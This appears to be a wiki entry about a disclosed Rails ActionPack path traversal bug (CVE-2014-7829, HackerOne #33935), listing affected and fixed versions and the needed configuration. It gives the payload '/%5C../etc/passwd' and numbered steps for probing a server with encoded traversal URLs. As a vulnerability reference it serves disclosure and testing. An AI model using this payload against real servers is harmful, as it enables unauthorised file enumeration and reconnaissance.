File Name Enumeration

From Hackipedia
Jump to: navigation, search
Hackerone #33935
Target: Hackerone
Target Module:
Type: Best Practice
Payload: /%5C../etc/passwd
Original: Link
CVE: CVE-2014-7829
Archive Screenshot

Web applications using old versions of Ruby's ActionPack are vulnerable to server file name enumeration.

Affected Ruby Versions Affected: >= 3.0.0 Not affected: < 3.0.0, 4.2.0.beta4 Fixed Versions: 3.2.21, 4.0.12, 4.1.8

For a Ruby instance to be vulnerable to this issue this config must be set:

config.serve_static_assets = true 

How To Perform

  1. Start with a base URL (www.example.com)
  2. Add known unused file (www.example.com/lkdlkladlf)
    1. Note response
  3. Add known file (www.example.com/etc/passwd)
  4. Add /%5C.. between the host and the known file (www.example.com/%5C../etc/passwd)
    1. Repeat and look for a different response from server (www.example.com/%5C../%5C../.....)